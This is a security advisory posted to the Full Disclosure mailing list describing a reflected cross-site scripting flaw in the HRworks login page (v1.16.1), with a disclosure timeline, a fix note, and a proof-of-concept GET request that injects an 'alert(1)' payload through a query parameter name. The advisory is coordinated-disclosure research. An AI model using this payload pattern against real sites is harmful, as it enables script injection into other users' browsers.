Date: Wed, 18 Sep 2019 09:51:06 +0000
From: Georg Ph E Heise via Fulldisclosure
Subject: [FD] Reflected XSS – HRworks Login (v1.16.1)

# Exploit Title:  Reflected XSS – HRworks Login (v1.16.1)

# Vendor Homepage:

# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions

# Contact:

# Website:

# Category: webapps

# CVE: CVE-2019-11559


26.04.2019 Disclosure to Vendor

29.04.2019 Vendor informed that the issue was remediated

17.09.2019 Publication

1. Description:

The login page reflects URL query parameters, including the parameter name, into its response without filtering or output encoding. In the proof of concept below the payload sits in the parameter name, and the "-alert(1)-" shape is the classic break-out from a double-quoted JavaScript string; depending on where the value is reflected, this yields several variants of reflected XSS.

2. Proof of Concept:

Vulnerable request:

GET /?re44h"-alert(1)-"bb8rf=1 HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*

3. Solution:

As of the date of publication, all versions above 1.16.3 are safe to use.

Sent through the Full Disclosure mailing list